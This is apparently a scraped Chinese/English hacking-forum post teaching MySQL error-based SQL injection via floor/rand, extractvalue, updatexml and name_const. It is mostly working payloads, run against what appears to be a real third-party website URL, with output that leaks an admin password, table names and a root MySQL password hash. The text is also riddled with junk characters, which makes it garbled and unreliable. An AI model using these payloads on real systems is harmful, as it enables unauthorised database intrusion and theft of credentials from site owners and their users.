|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:- g' V6 K. v# G7 w1 d( {
首先进行正常查询: mysql> select * from article where id = 1;
4 _& Y: r6 g( F, h+—-+——-+———+/ z; Z E) M' u, S' s# l5 B% R$ k) ~+ i
| id | title | content |3 i4 D' ^+ }4 E' j4 X( q
+—-+——-+———+4 e1 o# `3 m$ B5 Q* y2 D0 Y
| 1 | test | do it |
* p1 v9 `4 [ ?+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
" d1 K% [5 r2 c0 t( i( V6 HERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。, d5 w" P- e1 b! i+ f+ W
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
5 `4 G/ q2 I0 j- i: Z U8 X. g. rERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
1 o: ]9 ~# J7 N2 HERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue- N; P8 K* ]4 b5 K% A3 h
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
$ f K* ], h0 h, E: [' EERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ ! t: E' n: h% k* i( b5 E
1 B1 b& T# X7 b2 v# T$ z8 s9 [( R' }
再收集:
0 W& | Z1 t! y, [& bhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 3 k" n* G$ j( t" ^1 O0 o
) m' S$ B4 T. U- B" P$ mError uplicate column name ‘5.0.27-community-nt’Error uplicate column name ‘5.0.27-community-nt’% s* r! B7 ?0 e' d+ U7 }% e: K/ S
4 r: Z% v; I6 ]" I2 e
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)) |8 }7 _4 \% X; y* O" o6 K0 F
g7 d& ~- p7 I r1 B! D1 s
Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ ) T/ p* G* t5 g
! r& Z4 a4 J( }
MYSQL高版本报错注入技巧-利用NAME_CONST注入
) M- F8 k+ B- J7 {% ?: S! f: AIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. / P$ k- K. V6 g8 U' m8 x6 v2 u# [
1 R- m( j; X2 Q; F) }
0 G1 T4 y, X) @7 C3 ^相关信息* C9 @8 k4 k. m: A$ e
D5 d( f! m4 U
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.& h6 v8 E8 k Y% e, h$ q" G3 \
+ g1 u. o( j. s$ S. M
Code:8 x' q1 C. x2 V8 `: \# b
NAME_CONST(DATA, VALUE)! r7 V* l$ k9 e& J: r" I
( x8 X$ f/ e- h+ w, U9 ~Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants." Q1 X* G9 m: B9 n. g7 n" ?
/ }3 W% W; ]* D5 p6 Y0 q6 pSELECT NAME_CONST('TEST', 1)
8 V, O& y7 E: V4 W& B) G
2 _9 R2 X/ g V, j1 L4 W% N. w
; h: g" [1 y0 N/ B3 v6 Z& U
8 [/ ?, O y+ a: E' S& D& q|---------------|
# T- o: J+ h- h| TEST |
# ~$ N% c8 }: L! ]) _% Q| |( M8 R0 [& i* c- ?3 C! ~1 d- P
|---------------|" E z' g+ c: e" ]. G4 _4 \! f
| 1 |
! e/ _* \0 n& s$ P1 I& A7 r| |
5 T. D. Q$ L6 y4 [% M/ ||---------------|
: V3 ?5 x+ u& o' O# P: O$ @1 n4 ?6 f: r
" L. s' q4 D7 x# Q1 W& [8 Y( I& p1 F x% v% i
3 w" J# f& A% v. w0 q: x5 K
http://dev.mysql.com/doc/refman/5.0/en/m...name-const7 L p+ U$ G" e* ]3 V7 B a
Intro to MySQL Variables
. L9 {2 b9 r- I5 r/ }2 b! n4 t |6 P2 K- m7 I
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.9 u f4 [7 v3 Q' ]
0 T1 i; {& H7 H9 y" i
Code:
3 {, G. \! h7 w# @( X9 Ohttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261
# M& u! g8 y2 u( a8 d
( Q0 d) N; u& P/ B
3 ?, ^3 e0 o1 L" W. h3 b, B: W, g) c
, O$ H" F: r B+ C
% P- q& c( k: v$ `. K. k4 `# A
Code:
6 }; Q; T6 L* ?( [1 e: Q8 Wand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
# V& w& Q6 [8 f+ `* W( C; y' c3 G+ [
6 q B w. o. E Q1 s
, d/ O" |$ ]- rVAR = Your MySQL variable.
( m* A( F2 R7 K9 T0 j/ q# `6 |% z' i$ f g' }( P
MySQL 5.1.3 Server System Variables
, `( Z! q W$ o! J' T% s4 ~! X) R6 r% x$ _; v }% K9 W0 T
Let's try it out on my site..
9 {; q3 @% a: x! o g
5 e3 L4 o# e( o) j% V; OCode:
, C2 b: k( j, N0 N, ihttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--3 t- S' {: h3 C
3 l8 x. Q" \" ~" Q1 j4 uError uplicate column name '5.0.27-community-nt'
@ J& I* h% k2 ?1 y& [8 l* m" c4 D- R- n- F
5 H3 W. A5 D, {9 D( y" k6 D3 K0 X5 O5 m: i& o2 I: [* z
7 K/ d# L$ y# s2 [
W5 g$ }9 J- n4 u1 D
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
' m$ T7 j3 s$ @# t1 U5 F
* h/ k1 C; A% w7 uData Extraction
2 _# M( w# ^( s( Q' h! E! z3 o4 L
* c6 |& ?0 b n* L' F {5 V7 TCode:. h% m5 U% t$ g% w, C
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--$ a) s3 l$ M: m Y: F
, J3 `/ P _7 u. ]
: I3 u9 z3 ?6 d; z) f. K- k& q8 x
We should get a duplicate column 1 error..." o+ Q7 g- C, c% r
" G, _( g) z! [" e: X5 {+ w. t: M6 I
Code:) s( e/ b' o4 e- h1 V; Y+ {5 `+ h. I
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--- P" G/ h5 k) ?
3 S2 M0 O6 C* sError uplicate column name '1: }# ~1 _9 o6 n& X3 N* d
3 Z* y3 `6 G, H& W: @
* t& W! U4 Y0 ]% D
" E& N2 A- W H( a) q
$ t1 a! A6 e5 @/ H+ b5 I( V& A5 u9 H1 y
q; [, H: r% n# {: p qNow let's get the tables out this bitch..
w* G. Q, H: A. |6 O: o% N
( y3 K# K* f5 PCode:0 N5 F8 C' z% C$ z7 K8 \2 p6 y& [: c; \
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--3 K. H' s6 G$ h; \+ c8 i# ^! ~
; D0 g+ j6 v' o) M; t- ?7 S1 ?0 g+ W# s3 \* V# b; B
Let's see if it works here, if it does, we can go on and finish the job.
) h: [" P; |. F/ o
1 ?6 q2 J3 L& y% `7 qCode:) d+ }3 [4 Z6 b2 K1 w
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
! T/ P* J& x2 ^% Q; j1 N& |: @# H1 D; p# D
D/ w8 N2 b* G2 ~8 @2 lError uplicate column name 'com_admanage
- N+ G6 [5 d0 ^5 f& Y. }( M1 ?8 A3 _4 c1 o
. h* Y! w! I2 d$ o# K* W0 W+ R* t2 X) V0 ^
1 l$ `, E3 \* P7 X' N3 L
- F. P) e8 x; d+ i; @, ~, J7 ]' h
: S+ f# e- X: Y Z$ k1 m& e
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
d7 ^3 H$ D3 f f% @1 \
& @7 n' D; ~6 L' zLet's get the columns out of the user table..& h' O- u+ o1 q; G6 H6 ]
$ T# V3 i, P5 M3 X; bCode:: E* O e+ Z( G& g! C; F, O
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--4 x( n% l, o, h# O" b3 x& T4 A+ B
, Z1 X, S& E/ G; A! }/ T" X
/ ^7 w+ f% J$ l2 H6 m: e S; ASo mine looks like this, and I get the duplicate column name 'Host'.- Y7 V: D. X1 |6 h3 I' l- X
% d8 q% N7 P/ {0 h' Q1 d
Code:
1 e# `- c: }$ Z& n" |& W( _: Fhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--# }+ a# }7 u, L; s% |, z
- _" J q8 `. W% t2 DError uplicate column name 'Host'
3 E$ M6 y( \& X* h9 D: d
- v: o9 C6 g9 g4 x* p1 U; r' w. i
A9 p; L) |5 F0 X, D5 d7 U
$ o* \; d8 H Y4 D
: Q. N1 r4 |4 T% _+ \ k" n3 s% z# a$ {
& p' h( F* U( J& ]* Z$ DWoot, time to finish this bitch off.
2 r/ T1 V1 i7 P# P$ {$ V' H% L& W
( a8 n; P9 D. ?. Z0 y' w, _Code:/ d1 o+ ]2 A4 R* W) C& M* I
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
# B) I3 |4 d: v- @8 ]% N/ ]
7 Y2 m( j3 g7 N6 V
$ ?, @9 q) t% {So mine looks like this...
* l6 v, C8 U$ z" i' T
& O! O$ ~. f) J5 xCode:
7 ^2 x5 f2 z* h/ m; v5 qhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
" f$ i \, f9 d/ }8 ~# W1 u8 n7 G( G& i4 ^ h# y
Error uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82': t1 N$ D7 ?9 ?& v: N: s8 S2 k3 r; E
4 I) x: N# g4 b6 X. D+ p- m3 Z$ ~5 u
/ L @7 Q- @9 f4 o4 U" y
) N" ]0 x' B4 a) r+ N$ T8 I
- h- R" b+ y5 J( b. M
0 c$ U; a2 w9 [" k; ^2 a% `And there we have it, thanks for reading.- U5 j/ T! a6 Y: J- j9 W% e
' [. t+ j, x7 B
|